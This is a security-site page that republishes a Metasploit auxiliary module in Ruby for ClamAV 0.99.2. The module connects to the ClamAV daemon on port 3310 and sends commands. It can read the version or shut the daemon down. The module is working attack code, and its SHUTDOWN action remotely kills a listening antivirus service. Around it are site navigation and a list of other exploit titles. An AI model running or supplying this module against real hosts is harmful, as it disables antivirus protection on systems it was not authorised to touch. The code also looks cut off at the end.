ClamAV 0.99.2 Remote Command Transmitter Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

ClamAV 0.99.2 Remote Command Transmitter Exploit

来源：metasploit.com 作者：wvu 发布时间：2016-07-27

##

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

include Msf::Exploit::Remote::Tcp

include Msf::Auxiliary::Scanner

def initialize(info = {})

super(

update_info(

info,

'Name' => 'ClamAV Remote Command Transmitter',

'Description' => %q(

In certain configurations, ClamAV will bind to all addresses and listen for commands.

This module sends properly-formatted commands to the ClamAV daemon if it is in such a

configuration.

),

'Author' => [

'Alejandro Hdeza', # DISCOVER

'bwatters-r7', # MODULE

'wvu' # GUIDANCE

],

'License' => MSF_LICENSE,

'References' => [

[ 'URL', 'https://twitter.com/nitr0usmx/status/740673507684679680/photo/1' ],

[ 'URL', 'https://github.com/vrtadmin/clamav-faq/raw/master/manual/clamdoc.pdf' ]

],

'DisclosureDate' => 'Jun 8 2016',

'Actions' => [

[ 'VERSION', 'Description' => 'Get Version Information' ],

[ 'SHUTDOWN', 'Description' => 'Kills ClamAV Daemon' ]

],

'DefaultAction' => 'VERSION'

)

register_options(

[

Opt::RPORT(3310)

], self.class

)

end

def run_host(_ip)

begin

connect

sock.put(action.name + "\n")

print_good(sock.get_once)

rescue EOFError

print_good('Successfully shut down ClamAV Service')

ensure

disconnect

end

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告